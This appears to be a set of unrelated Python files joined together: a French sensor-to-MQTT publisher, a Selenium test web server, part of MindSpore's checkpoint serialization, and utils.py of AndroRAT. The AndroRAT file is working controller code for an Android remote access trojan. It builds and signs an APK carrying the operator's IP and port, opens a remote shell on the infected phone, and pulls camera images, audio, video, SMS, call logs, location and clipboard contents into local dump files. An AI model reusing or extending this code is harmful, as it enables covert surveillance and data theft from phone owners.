logging.info('Démarrage de SailUI-Publish sensors, début de journalisation')
user_signal = True # variable global de boucle infinie
axes = ['x','y','z']
def thread_gyro(threadstop, mqttclient, gyro):
while True:
# Gyroscope
gyro.icm20948update()
roll, pitch, yaw = icm20948.Roll, icm20948.Pitch, icm20948.Yaw
acceleration = icm20948.Acceleration
gyroscope = icm20948.Gyroscope
magnetic = icm20948.Magnetic
message = '[GYROSCOPE]\n' + \
'Roll = {:.2f}, Pitch = {:.2f}, Yaw = {:.2f}\n'.format(roll, pitch, yaw) + \
'Acceleration: X = {}, Y = {}, Z = {}\n'.format(acceleration[0], acceleration[1], acceleration[2]) + \
'Gyroscope: X = {}, Y = {}, Z = {}\n'.format(gyroscope[0], gyroscope[1], gyroscope[2]) + \
'Magnetic: X = {}, Y = {}, Z = {}'.format(magnetic[0], magnetic[1], magnetic[2])
logging.debug(message)
# MQTT
for ax in zip(['roll', 'pitch', 'yaw'], [roll, pitch, yaw]):
result = mqttclient.publish(f'gyro/{ax[0]}',ax[1]) # result: [code, message_id]
if result[0] != 0:
logging.exception(f"Gyroscope, échec de l'envoi du message roll/pich/yaw au broker")
for field in zip(['acceleration', 'gyroscope', 'magnetic'], [acceleration, gyroscope, magnetic]):
for ax in range(0,3):
result = mqttclient.publish(f'gyro/{field[0]}/{axes[ax]}',field[1][ax]) # result: [code, message_id]
if result[0] != 0:
logging.exception(f"Gyroscope, échec de l'envoi du message au broker")
if not threadstop():
logging.info('Arrêt du thread Gyroscope')
print('Arrêt du thread Gyroscope',threadstop())
break
def thread_baro(threadstop, mqttclient, baro):
while True:
time.sleep(5)
# Baromètre
baro.update()
pression, temperature = baro.PRESS_DATA, baro.TEMP_DATA
logging.debug('[BAROMETRE] Pressure = {:6.2f} hPa , Temperature = {:6.2f} °C'.format(pression, temperature) )
# MQTT
result = mqttclient.publish(f'baro/pression',pression) # result: [code, message_id]
if result[0] != 0:
logging.exception(f"Barometre, échec de l'envoi du message pression au broker")
result = mqttclient.publish(f'baro/temperature', temperature) # result: [code, message_id]
if result[0] != 0:
logging.exception(f"Barometre, échec de l'envoi du message temperature au broker")
if not threadstop():
logging.info('Arrêt du thread Barometre')
print('Arrêt du thread Barometre',threadstop())
break
def thread_therm(threadstop, mqttclient, therm):
while True:
time.sleep(1)
# Thermomètre
temperature, humidite = therm.measurements
logging.debug('[THERMOMETRE] Temperature = {:6.2f}°C , Humidity = {:6.2f}%%'.format(temperature, humidite) )
# MQTT
result = mqttclient.publish(f'therm/temperature',temperature) # result: [code, message_id]
if result[0] != 0:
logging.exception(f"Thermometre, échec de l'envoi du message temperature au broker")
result = mqttclient.publish(f'therm/humidite', humidite) # result: [code, message_id]
if result[0] != 0:
logging.exception(f"Thermometre, échec de l'envoi du message au broker")
if not threadstop():
logging.info('Arrêt du thread Thermometre')
print('Arrêt du thread Thermometre',threadstop())
break
# [MQTT] The callback for when the client receives a CONNACK response from the server.
def on_connect(client, userdata, flags, rc):
if rc == 0:
logging.info('Connected to MQTT broker successfully!')
else:
logging.warning("Connected with result code "+mqtt.connack_string(rc))
# Subscribing in on_connect() means that if we lose the connection and
# reconnect then subscriptions will be renewed.
client.subscribe("$SYS/#")
# [MQTT] The callback for when a PUBLISH message is received from the server.
def on_message(client, userdata, msg):
#print(msg.topic+" "+str(msg.payload))
pass
# [MQTT] The callback for when a PUBLISH message is send to the server.
def on_publish(mosq, obj, mid):
#print("Publish mid: " + str(mid))
pass
if __name__ == '__main__':
##############################################
# 0. Initialisation des différents composants
##############################################
# - GPIOs
# - base influxdb
# - gyroscope
# - Baromètre
# - Thermomètre
logging.debug('Initialisation du programme')
# Initialisation des capteurs
MotionVal = [0.0 for _ in range(0,9)]
icm20948 = ICM20948() # Gyroscope
lps22hb = LPS22HB() # Pression/température
i2c = busio.I2C(board.SCL, board.SDA)
shtc3 = adafruit_shtc3.SHTC3(i2c) # Température/humidité
logging.info('Capteurs initialisés')
# Client MQTT
client = mqtt.Client()
client.on_connect = on_connect
client.on_message = on_message
client.on_publish = on_publish
client.connect("127.0.0.1", 1883, 60)
client.loop_start()
logging.info(f'MQTT, connexions au serveur établie')
##############################################
# 1. Lancement des threads
##############################################
# - écoute du baromètre
# - écoute du thermomètre
# - écoute du gyroscope
stop_thread = lambda : user_signal
# Ecoute des capteurs thread_capteurs(threadname, gyro, baro, therm):
threads_capteurs = []
for capteur in zip([icm20948, lps22hb, shtc3], ['Gyroscope', 'Baromètre', 'Thermomètre'], [thread_gyro, thread_baro, thread_therm]):
threadObj = threading.Thread( target=capteur[2], args=(stop_thread, client, capteur[0]), name=capteur[1] )
threads_capteurs.append(threadObj)
threadObj.start()
logging.info(f'Thread {capteur[1]} démarré')
##############################################
# 2. Supervision des threads
##############################################
# - Boucle permanente pour superviser les threads
while True and user_signal:
time.sleep(1) # Toutes les secondes
try:
for thr in threads_capteurs:
if not thr.is_alive():
message = '[{}] {} {}'.format(time.ctime(), thr.getName(), thr.is_alive())
logging.warning(message)
except (KeyboardInterrupt, SystemExit): #when you press ctrl+c
user_signal = False
logging.info("Done.\nExiting.")
else:
logging.info('Going to shut down now...')
|
utils.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
import os
import base64
import time
import binascii
import select
import pathlib
import platform
import re
from subprocess import PIPE, run
from colorama import Fore, Style,init
from pyngrok import ngrok
import socket
import threading
import itertools
import queue
banner = """\033[1m\033[91m
_ _____ _______
/\ | | | __ \ /\|__ __|
/ \ _ __ __| |_ __ ___ | |__) | / \ | |
/ /\ \ | '_ \ / _` | '__/ _ \| _ / / /\ \ | |
/ ____ \| | | | (_| | | | (_) | | \ \ / ____ \| |
/_/ \_\_| |_|\__,_|_| \___/|_| \_\/_/ \_\_|
\033[93m- By karma9874
"""
pattern = '\"(\\d+\\.\\d+).*\"'
def stdOutput(type_=None):
if type_=="error":col="31m";str="ERROR"
if type_=="warning":col="33m";str="WARNING"
if type_=="success":col="32m";str="SUCCESS"
if type_ == "info":return "\033[1m[\033[33m\033[0m\033[1m\033[33mINFO\033[0m\033[1m] "
message = "\033[1m[\033[31m\033[0m\033[1m\033["+col+str+"\033[0m\033[1m]\033[0m "
return message
def animate(message):
chars = "/—\\|"
for char in chars:
sys.stdout.write("\r"+stdOutput("info")+"\033[1m"+message+"\033[31m"+char+"\033[0m")
time.sleep(.1)
sys.stdout.flush()
def clearDirec():
if(platform.system() == 'Windows'):
clear = lambda: os.system('cls')
direc = "\\"
init(convert=True)
else:
clear = lambda: os.system('clear')
direc = "/"
return clear,direc
clear,direc = clearDirec()
if not os.path.isdir(os.getcwd()+direc+"Dumps"):
os.makedirs("Dumps")
def is_valid_ip(ip):
m = re.match(r"^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$", ip)
return bool(m) and all(map(lambda n: 0 <= int(n) <= 255, m.groups()))
def is_valid_port(port):
i = 1 if port.isdigit() and len(port)>1 else 0
return i
def execute(command):
return run(command, stdout=PIPE, stderr=PIPE, universal_newlines=True, shell=True)
def executeCMD(command,queue):
result = run(command, stdout=PIPE, stderr=PIPE, universal_newlines=True, shell=True)
queue.put(result)
return result
def getpwd(name):
return os.getcwd()+direc+name;
def help():
helper="""
Usage:
deviceInfo --> returns basic info of the device
camList --> returns cameraID
takepic [cameraID] --> Takes picture from camera
startVideo [cameraID] --> starts recording the video
stopVideo --> stop recording the video and return the video file
startAudio --> starts recording the audio
stopAudio --> stop recording the audio
getSMS [inbox|sent] --> returns inbox sms or sent sms in a file
getCallLogs --> returns call logs in a file
shell --> starts a interactive shell of the device
vibrate [number_of_times] --> vibrate the device number of time
getLocation --> return the current location of the device
getIP --> returns the ip of the device
getSimDetails --> returns the details of all sim of the device
clear --> clears the screen
getClipData --> return the current saved text from the clipboard
getMACAddress --> returns the mac address of the device
exit --> exit the interpreter
"""
print(helper)
def getImage(client):
print(stdOutput("info")+"\033[0mTaking Image")
timestr = time.strftime("%Y%m%d-%H%M%S")
flag=0
filename ="Dumps"+direc+"Image_"+timestr+'.jpg'
imageBuffer=recvall(client)
imageBuffer = imageBuffer.strip().replace("END123","").strip()
if imageBuffer=="":
print(stdOutput("error")+"Unable to connect to the Camera\n")
return
with open(filename,'wb') as img:
try:
imgdata = base64.b64decode(imageBuffer)
img.write(imgdata)
print(stdOutput("success")+"Succesfully Saved in \033[1m\033[32m"+getpwd(filename)+"\n")
except binascii.Error as e:
flag=1
print(stdOutput("error")+"Not able to decode the Image\n")
if flag == 1:
os.remove(filename)
def readSMS(client,data):
print(stdOutput("info")+"\033[0mGetting "+data+" SMS")
msg = "start"
timestr = time.strftime("%Y%m%d-%H%M%S")
filename = "Dumps"+direc+data+"_"+timestr+'.txt'
flag =0
with open(filename, 'w',errors="ignore", encoding="utf-8") as txt:
msg = recvall(client)
try:
txt.write(msg)
print(stdOutput("success")+"Succesfully Saved in \033[1m\033[32m"+getpwd(filename)+"\n")
except UnicodeDecodeError:
flag = 1
print(stdOutput("error")+"Unable to decode the SMS\n")
if flag == 1:
os.remove(filename)
def getFile(filename,ext,data):
fileData = "Dumps"+direc+filename+"."+ext
flag=0
with open(fileData, 'wb') as file:
try:
rawFile = base64.b64decode(data)
file.write(rawFile)
print(stdOutput("success")+"Succesfully Downloaded in \033[1m\033[32m"+getpwd(fileData)+"\n")
except binascii.Error:
flag=1
print(stdOutput("error")+"Not able to decode the Audio File")
if flag == 1:
os.remove(filename)
def putFile(filename):
data = open(filename, "rb").read()
encoded = base64.b64encode(data)
return encoded
def shell(client):
msg = "start"
command = "ad"
while True:
msg = recvallShell(client)
if "getFile" in msg:
msg=" "
msg1 = recvall(client)
msg1 = msg1.replace("\nEND123\n","")
filedata = msg1.split("|_|")
getFile(filedata[0],filedata[1],filedata[2])
if "putFile" in msg:
msg=" "
sendingData=""
filename = command.split(" ")[1].strip()
file = pathlib.Path(filename)
if file.exists():
encoded_data = putFile(filename).decode("UTF-8")
filedata = filename.split(".")
sendingData+="putFile"+"<"+filedata[0]+"<"+filedata[1]+"<"+encoded_data+"END123\n"
client.send(sendingData.encode("UTF-8"))
print(stdOutput("success")+f"Succesfully Uploaded the file \033[32m{filedata[0]+'.'+filedata[1]} in /sdcard/temp/")
else:
print(stdOutput("error")+"File not exist")
if "Exiting" in msg:
print("\033[1m\033[33m----------Exiting Shell----------\n")
return
msg = msg.split("\n")
for i in msg[:-2]:
print(i)
print(" ")
command = input("\033[1m\033[36mandroid@shell:~$\033[0m \033[1m")
command = command+"\n"
if command.strip() == "clear":
client.send("test\n".encode("UTF-8"))
clear()
else:
client.send(command.encode("UTF-8"))
def getLocation(sock):
msg = "start"
while True:
msg = recvall(sock)
msg = msg.split("\n")
for i in msg[:-2]:
print(i)
if("END123" in msg):
return
print(" ")
def recvall(sock):
buff=""
data = ""
while "END123" not in data:
data = sock.recv(4096).decode("UTF-8","ignore")
buff+=data
return buff
def recvallShell(sock):
buff=""
data = ""
ready = select.select([sock], [], [], 3)
while "END123" not in data:
if ready[0]:
data = sock.recv(4096).decode("UTF-8","ignore")
buff+=data
else:
buff="bogus"
return buff
return buff
def stopAudio(client):
print(stdOutput("info")+"\033[0mDownloading Audio")
timestr = time.strftime("%Y%m%d-%H%M%S")
data= ""
flag =0
data=recvall(client)
data = data.strip().replace("END123","").strip()
filename = "Dumps"+direc+"Audio_"+timestr+".mp3"
with open(filename, 'wb') as audio:
try:
audioData = base64.b64decode(data)
audio.write(audioData)
print(stdOutput("success")+"Succesfully Saved in \033[1m\033[32m"+getpwd(filename))
except binascii.Error:
flag=1
print(stdOutput("error")+"Not able to decode the Audio File")
print(" ")
if flag == 1:
os.remove(filename)
def stopVideo(client):
print(stdOutput("info")+"\033[0mDownloading Video")
timestr = time.strftime("%Y%m%d-%H%M%S")
data= ""
flag=0
data=recvall(client)
data = data.strip().replace("END123","").strip()
filename = "Dumps"+direc+"Video_"+timestr+'.mp4'
with open(filename, 'wb') as video:
try:
videoData = base64.b64decode(data)
video.write(videoData)
print(stdOutput("success")+"Succesfully Saved in \033[1m\033[32m"+getpwd(filename))
except binascii.Error:
flag = 1
print(stdOutput("error")+"Not able to decode the Video File\n")
if flag == 1:
os.remove("Video_"+timestr+'.mp4')
def callLogs(client):
print(stdOutput("info")+"\033[0mGetting Call Logs")
msg = "start"
timestr = time.strftime("%Y%m%d-%H%M%S")
msg = recvall(client)
filename = "Dumps"+direc+"Call_Logs_"+timestr+'.txt'
if "No call logs" in msg:
msg.split("\n")
print(msg.replace("END123","").strip())
print(" ")
else:
with open(filename, 'w',errors="ignore", encoding="utf-8") as txt:
txt.write(msg)
txt.close()
print(stdOutput("success")+"Succesfully Saved in \033[1m\033[32m"+getpwd(filename)+"\033[0m")
if not os.path.getsize(filename):
os.remove(filename)
def get_shell(ip,port):
soc = socket.socket()
soc = socket.socket(type=socket.SOCK_STREAM)
try:
# Restart the TCP server on exit
soc.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
soc.bind((ip, int(port)))
except Exception as e:
print(stdOutput("error")+"\033[1m %s"%e);exit()
soc.listen(2)
print(banner)
while True:
que = queue.Queue()
t = threading.Thread(target=connection_checker,args=[soc,que])
t.daemon = True
t.start()
while t.is_alive(): animate("Waiting for Connections ")
t.join()
conn, addr = que.get()
clear()
print("\033[1m\033[33mGot connection from \033[31m"+"".join(str(addr))+"\033[0m")
print(" ")
while True:
msg = conn.recv(4024).decode("UTF-8")
if(msg.strip() == "IMAGE"):
getImage(conn)
elif("readSMS" in msg.strip()):
content = msg.strip().split(" ")
data = content[1]
readSMS(conn,data)
elif(msg.strip() == "SHELL"):
shell(conn)
elif(msg.strip() == "getLocation"):
getLocation(conn)
elif(msg.strip() == "stopVideo123"):
stopVideo(conn)
elif(msg.strip() == "stopAudio"):
stopAudio(conn)
elif(msg.strip() == "callLogs"):
callLogs(conn)
elif(msg.strip() == "help"):
help()
else:
print(stdOutput("error")+msg) if "Unknown Command" in msg else print("\033[1m"+msg) if "Hello there" in msg else print(msg)
message_to_send = input("\033[1m\033[36mInterpreter:/> \033[0m")+"\n"
conn.send(message_to_send.encode("UTF-8"))
if message_to_send.strip() == "exit":
print(" ")
print("\033[1m\033[32m\t (∗ ・‿・)ノ゛\033[0m")
sys.exit()
if(message_to_send.strip() == "clear"):clear()
def connection_checker(socket,queue):
conn, addr = socket.accept()
queue.put([conn,addr])
return conn,addr
def build(ip,port,output,ngrok=False,ng=None,icon=None):
editor = "Compiled_apk"+direc+"smali"+direc+"com"+direc+"example"+direc+"reverseshell2"+direc+"config.smali"
try:
file = open(editor,"r").readlines()
#Very much uncertaninity but cant think any other way to do it xD
file[18]=file[18][:21]+"\""+ip+"\""+"\n"
file[23]=file[23][:21]+"\""+port+"\""+"\n"
file[28]=file[28][:15]+" 0x0"+"\n" if icon else file[28][:15]+" 0x1"+"\n"
str_file="".join([str(elem) for elem in file])
open(editor,"w").write(str_file)
except Exception as e:
print(e)
sys.exit()
java_version = execute("java -version")
if java_version.returncode: print(stdOutput("error")+"Java Not Installed");exit()
#version_no = re.search(pattern, java_version.stderr).groups()[0]
# if float(version_no) > 1.8: print(stdOutput("error")+"Java 8 is required, Java version found "+version_no);exit()
print(stdOutput("info")+"\033[0mGenerating APK")
outFileName = output if output else "karma.apk"
que = queue.Queue()
t = threading.Thread(target=executeCMD,args=["java -jar Jar_utils/apktool.jar b Compiled_apk -o "+outFileName,que],)
t.start()
while t.is_alive(): animate("Building APK ")
t.join()
print(" ")
resOut = que.get()
if not resOut.returncode:
print(stdOutput("success")+"Successfully apk built in \033[1m\033[32m"+getpwd(outFileName)+"\033[0m")
print(stdOutput("info")+"\033[0mSigning the apk")
t = threading.Thread(target=executeCMD,args=["java -jar Jar_utils/sign.jar -a "+outFileName+" --overwrite",que],)
t.start()
while t.is_alive(): animate("Signing Apk ")
t.join()
print(" ")
resOut = que.get()
if not resOut.returncode:
print(stdOutput("success")+"Successfully signed the apk \033[1m\033[32m"+outFileName+"\033[0m")
if ngrok:
clear()
get_shell("0.0.0.0",8000) if not ng else get_shell("0.0.0.0",ng)
print(" ")
else:
print("\r"+resOut.stderr)
print(stdOutput("error")+"Signing Failed")
else:
print("\r"+resOut.stderr)
print(stdOutput("error")+"Building Failed")
|
webserver.py
|
# Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""A simple web server for testing purpose.
It serves the testing html pages that are needed by the webdriver unit tests."""
import logging
import os
import socket
import threading
from io import open
try:
from urllib import request as urllib_request
except ImportError:
import urllib as urllib_request
try:
from http.server import BaseHTTPRequestHandler, HTTPServer
except ImportError:
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
def updir():
dirname = os.path.dirname
return dirname(dirname(__file__))
LOGGER = logging.getLogger(__name__)
WEBDRIVER = os.environ.get("WEBDRIVER", updir())
HTML_ROOT = os.path.join(WEBDRIVER, "../../../../../../common/src/web")
if not os.path.isdir(HTML_ROOT):
message = ("Can't find 'common_web' directory, try setting WEBDRIVER"
" environment variable WEBDRIVER:" + WEBDRIVER + " HTML_ROOT:" + HTML_ROOT )
LOGGER.error(message)
assert 0, message
DEFAULT_HOST = "127.0.0.1"
DEFAULT_PORT = 8000
class HtmlOnlyHandler(BaseHTTPRequestHandler):
"""Http handler."""
def do_GET(self):
"""GET method handler."""
try:
path = self.path[1:].split('?')[0]
html = open(os.path.join(HTML_ROOT, path), 'r', encoding='latin-1')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(html.read().encode('utf-8'))
html.close()
except IOError:
self.send_error(404, 'File Not Found: %s' % path)
def log_message(self, format, *args):
"""Override default to avoid trashing stderr"""
pass
class SimpleWebServer(object):
"""A very basic web server."""
def __init__(self, host=DEFAULT_HOST, port=DEFAULT_PORT):
self.stop_serving = False
host = host
port = port
while True:
try:
self.server = HTTPServer(
(host, port), HtmlOnlyHandler)
self.host = host
self.port = port
break
except socket.error:
LOGGER.debug("port %d is in use, trying to next one"
% port)
port += 1
self.thread = threading.Thread(target=self._run_web_server)
def _run_web_server(self):
"""Runs the server loop."""
LOGGER.debug("web server started")
while not self.stop_serving:
self.server.handle_request()
self.server.server_close()
def start(self):
"""Starts the server."""
self.thread.start()
def stop(self):
"""Stops the server."""
self.stop_serving = True
try:
# This is to force stop the server loop
urllib_request.URLopener().open("http://%s:%d" % (self.host,self.port))
except IOError:
pass
LOGGER.info("Shutting down the webserver")
self.thread.join()
def where_is(self, path):
return "http://%s:%d/%s" % (self.host, self.port, path)
def main(argv=None):
from optparse import OptionParser
from time import sleep
if argv is None:
import sys
argv = sys.argv
parser = OptionParser("%prog [options]")
parser.add_option("-p", "--port", dest="port", type="int",
help="port to listen (default: %s)" % DEFAULT_PORT,
default=DEFAULT_PORT)
opts, args = parser.parse_args(argv[1:])
if args:
parser.error("wrong number of arguments") # Will exit
server = SimpleWebServer(opts.port)
server.start()
print("Server started on port %s, hit CTRL-C to quit" % opts.port)
try:
while 1:
sleep(0.1)
except KeyboardInterrupt:
pass
if __name__ == "__main__":
main()
|
serialization.py
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Model and parameters serialization."""
import os
import stat
import math
from threading import Thread, Lock
import numpy as np
import mindspore.nn as nn
from mindspore import log as logger
from mindspore.train.checkpoint_pb2 import Checkpoint
from mindspore.train.print_pb2 import Print
from mindspore.common.tensor import Tensor
from mindspore.common.initializer import initializer
from mindspore.common.parameter import Parameter
from mindspore.common.api import _executor
from mindspore.common import dtype as mstype
from mindspore._checkparam import check_input_data
__all__ = ["save_checkpoint", "load_checkpoint", "load_param_into_net", "export", "parse_print"]
tensor_to_ms_type = {"Int8": mstype.int8, "Uint8": mstype.uint8, "Int16": mstype.int16, "Uint16": mstype.uint16,
"Int32": mstype.int32, "Uint32": mstype.uint32, "Int64": mstype.int64, "Uint64": mstype.uint64,
"Float16": mstype.float16, "Float32": mstype.float32, "Float64": mstype.float64,
"Bool": mstype.bool_}
tensor_to_np_type = {"Int8": np.int8, "Uint8": np.uint8, "Int16": np.int16, "Uint16": np.uint16,
"Int32": np.int32, "Uint32": np.uint32, "Int64": np.int64, "Uint64": np.uint64,
"Float16": np.float16, "Float32": np.float32, "Float64": np.float64, "Bool": np.bool_}
_ckpt_mutex = Lock()
SLICE_SIZE = 512 * 1024 * 1024
def _special_process_par(par, new_par):
"""
Processes the special condition.
Like (12,2048,1,1)->(12,2048), this case is caused by GE 4 dimensions tensor.
"""
par_shape_len = len(par.data.shape)
new_par_shape_len = len(new_par.data.shape)
delta_len = new_par_shape_len - par_shape_len
delta_i = 0
for delta_i in range(delta_len):
if new_par.data.shape[par_shape_len + delta_i] != 1:
break
if delta_i == delta_len - 1:
new_val = new_par.data.asnumpy()
new_val = new_val.reshape(par.data.shape)
par.set_parameter_data(Tensor(new_val, par.data.dtype))
return True
return False
def _update_param(param, new_param):
"""Updates param's data from new_param's data."""
if isinstance(param.data, Tensor) and isinstance(new_param.data, Tensor):
if param.data.dtype != new_param.data.dtype:
logger.error("Failed to combine the net and the parameters for param %s.", param.name)
msg = ("Net parameters {} type({}) different from parameter_dict's({})"
.format(param.name, param.data.dtype, new_param.data.dtype))
raise RuntimeError(msg)
if param.data.shape != new_param.data.shape:
if not _special_process_par(param, new_param):
logger.error("Failed to combine the net and the parameters for param %s.", param.name)
msg = ("Net parameters {} shape({}) different from parameter_dict's({})"
.format(param.name, param.data.shape, new_param.data.shape))
raise RuntimeError(msg)
return
param.set_parameter_data(new_param.data)
return
if isinstance(param.data, Tensor) and not isinstance(new_param.data, Tensor):
if param.data.shape != (1,) and param.data.shape != ():
logger.error("Failed to combine the net and the parameters for param %s.", param.name)
msg = ("Net parameters {} shape({}) is not (1,), inconsitent with parameter_dict's(scalar)."
.format(param.name, param.data.shape))
raise RuntimeError(msg)
param.set_parameter_data(initializer(new_param.data, param.data.shape, param.data.dtype))
elif isinstance(new_param.data, Tensor) and not isinstance(param.data, Tensor):
logger.error("Failed to combine the net and the parameters for param %s.", param.name)
msg = ("Net parameters {} type({}) different from parameter_dict's({})"
.format(param.name, type(param.data), type(new_param.data)))
raise RuntimeError(msg)
else:
param.set_parameter_data(type(param.data)(new_param.data))
def _exec_save(ckpt_file_name, data_list):
"""Execute save checkpoint into file process."""
try:
with _ckpt_mutex:
if os.path.exists(ckpt_file_name):
os.remove(ckpt_file_name)
with open(ckpt_file_name, "ab") as f:
for name, value in data_list.items():
data_size = value[2].nbytes
if data_size > SLICE_SIZE:
slice_count = math.ceil(data_size / SLICE_SIZE)
param_slice_list = np.array_split(value[2], slice_count)
else:
param_slice_list = [value[2]]
for param_slice in param_slice_list:
checkpoint_list = Checkpoint()
param_value = checkpoint_list.value.add()
param_value.tag = name
param_tensor = param_value.tensor
param_tensor.dims.extend(value[0])
param_tensor.tensor_type = value[1]
param_tensor.tensor_content = param_slice.tostring()
f.write(checkpoint_list.SerializeToString())
os.chmod(ckpt_file_name, stat.S_IRUSR)
except BaseException as e:
logger.error("Failed to save the checkpoint file %s.", ckpt_file_name)
raise RuntimeError(e.__str__())
def save_checkpoint(parameter_list, ckpt_file_name, async_save=False):
"""
Saves checkpoint info to a specified file.
Args:
parameter_list (list): Parameters list, each element is a dict
like {"name":xx, "type":xx, "shape":xx, "data":xx}.
ckpt_file_name (str): Checkpoint file name.
async_save (bool): Whether asynchronous execute save checkpoint into file. Default: False
Raises:
RuntimeError: Failed to save the Checkpoint file.
"""
logger.info("Execute save checkpoint process.")
data_list = {}
with _ckpt_mutex:
for param in parameter_list:
key = param["name"]
data_list[key] = []
if isinstance(param["data"], Parameter):
param["data"].init_data()
dims = []
if param['data'].shape == ():
dims.append(0)
else:
for dim in param['data'].shape:
dims.append(dim)
data_list[key].append(dims)
tensor_type = str(param["data"].dtype)
data_list[key].append(tensor_type)
data = param["data"].asnumpy().reshape(-1)
data_list[key].append(data)
if async_save:
thr = Thread(target=_exec_save, args=(ckpt_file_name, data_list), name="asyn_save_ckpt")
thr.start()
else:
_exec_save(ckpt_file_name, data_list)
logger.info("Save checkpoint process finish.")
def load_checkpoint(ckpt_file_name, net=None):
"""
Loads checkpoint info from a specified file.
Args:
ckpt_file_name (str): Checkpoint file name.
net (Cell): Cell network. Default: None
Returns:
Dict, key is parameter name, value is a Parameter.
Raises:
ValueError: Checkpoint file is incorrect.
"""
if not isinstance(ckpt_file_name, str):
raise ValueError("The ckpt_file_name must be string.")
if not os.path.exists(ckpt_file_name):
raise ValueError("The checkpoint file is not exist.")
if ckpt_file_name[-5:] != ".ckpt":
raise ValueError("Please input the correct checkpoint file name.")
if os.path.getsize(ckpt_file_name) == 0:
raise ValueError("The checkpoint file may be empty, please make sure enter the correct file name.")
logger.info("Execute load checkpoint process.")
checkpoint_list = Checkpoint()
try:
with open(ckpt_file_name, "rb") as f:
pb_content = f.read()
checkpoint_list.ParseFromString(pb_content)
except BaseException as e:
logger.error("Failed to read the checkpoint file `%s`, please check the correct of the file.", ckpt_file_name)
raise ValueError(e.__str__())
parameter_dict = {}
try:
element_id = 0
param_data_list = []
for element in checkpoint_list.value:
data = element.tensor.tensor_content
data_type = element.tensor.tensor_type
np_type = tensor_to_np_type[data_type]
ms_type = tensor_to_ms_type[data_type]
element_data = np.frombuffer(data, np_type)
param_data_list.append(element_data)
if (element_id == len(checkpoint_list.value) - 1) or \
(element.tag != checkpoint_list.value[element_id + 1].tag):
param_data = np.concatenate((param_data_list), axis=0)
param_data_list.clear()
dims = element.tensor.dims
if dims == [0]:
if 'Float' in data_type:
param_data = float(param_data[0])
elif 'Int' in data_type:
param_data = int(param_data[0])
parameter_dict[element.tag] = Parameter(Tensor(param_data, ms_type), name=element.tag)
elif dims == [1]:
parameter_dict[element.tag] = Parameter(Tensor(param_data, ms_type), name=element.tag)
else:
param_dim = []
for dim in dims:
param_dim.append(dim)
param_value = param_data.reshape(param_dim)
parameter_dict[element.tag] = Parameter(Tensor(param_value, ms_type), name=element.tag)
element_id += 1
logger.info("Load checkpoint process finish.")
except BaseException as e:
logger.error("Failed to load the checkpoint file `%s`.", ckpt_file_name)
raise RuntimeError(e.__str__())
if net is not None:
load_param_into_net(net, parameter_dict)
return parameter_dict
def load_param_into_net(net, parameter_dict):
"""
Loads parameters into network.
Args:
net (Cell): Cell network.
parameter_dict (dict): Parameter dict.
Raises:
TypeError: Argument is not a Cell, or parameter_dict is not a Parameter dict.
"""
if not isinstance(net, nn.Cell):
logger.error("Failed to combine the net and the parameters.")
msg = ("Argument net should be a Cell, but got {}.".format(type(net)))
raise TypeError(msg)
if not isinstance(parameter_dict, dict):
logger.error("Failed to combine the net and the parameters.")
msg = ("Argument parameter_dict should be a dict, but got {}.".format(type(parameter_dict)))
raise TypeError(msg)
logger.info("Execute load parameter into net process.")
net.init_parameters_data()
param_not_load = []
for _, param in net.parameters_and_names():
if param.name in parameter_dict:
new_param = parameter_dict[param.name]
if not isinstance(new_param, Parameter):
logger.error("Failed to combine the net and the parameters.")
msg = ("Argument parameter_dict element should be a Parameter, but got {}.".format(type(new_param)))
raise TypeError(msg)
_update_param(param, new_param)
else:
param_not_load.append(param.name)
if param_not_load:
_load_dismatch_prefix_params(net, parameter_dict, param_not_load)
logger.debug("Params not matched(in net but not in parameter_dict):")
for param_name in param_not_load:
logger.debug("%s", param_name)
logger.info("Load parameter into net finish, {} parameters has not been loaded.".format(len(param_not_load)))
def _load_dismatch_prefix_params(net, parameter_dict, param_not_load):
"""When some net parameter did not load, try to continue load."""
prefix_name = ""
longest_name = param_not_load[0]
while prefix_name != longest_name and param_not_load:
logger.debug("Count: {} parameters has not been loaded, try to load continue.".format(len(param_not_load)))
prefix_name = longest_name
for net_param_name in param_not_load:
for dict_name in parameter_dict:
if dict_name.endswith(net_param_name):
prefix_name = dict_name[:-len(net_param_name)]
break
if prefix_name != longest_name:
break
if prefix_name != longest_name:
logger.warning("Remove parameter prefix name: {}, continue to load.".format(prefix_name))
for _, param in net.parameters_and_names():
new_param_name = prefix_name + param.name
if param.name in param_not_load and new_param_name in parameter_dict:
new_param = parameter_dict[new_param_name]
_update_param(param, new_param)
param_not_load.remove(param.name)
def _save_graph(network, file_name):
"""
Saves the graph of network to a file.
Args:
network (Cell): Obtain a pipeline through network for saving graph.
file_name (str): Graph file name into which the graph will be saved.
"""
logger.info("Execute save the graph process.")
graph_proto = network.get_func_graph_proto()
if graph_proto:
with open(file_name, "wb") as f:
f.write(graph_proto)
os.chmod(file_name, stat.S_IRUSR)
def _exec_save_checkpoint(train_network, ckpt_file_name, integrated_save=True, async_save=False):
"""
Saves checkpoint for 'ms' backend.
Args:
train_network (Network): The train network for training.
ckpt_file_name (str): The name of checkpoint file.
integrated_save (bool): Whether to integrated save in automatic model parallel scene.
async_save (bool): Whether asynchronous execute save checkpoint into file. Default: False.
"""
train_network.init_parameters_data()
param_dict = {}
for _, param in train_network.parameters_and_names():
param_dict[param.name] = param
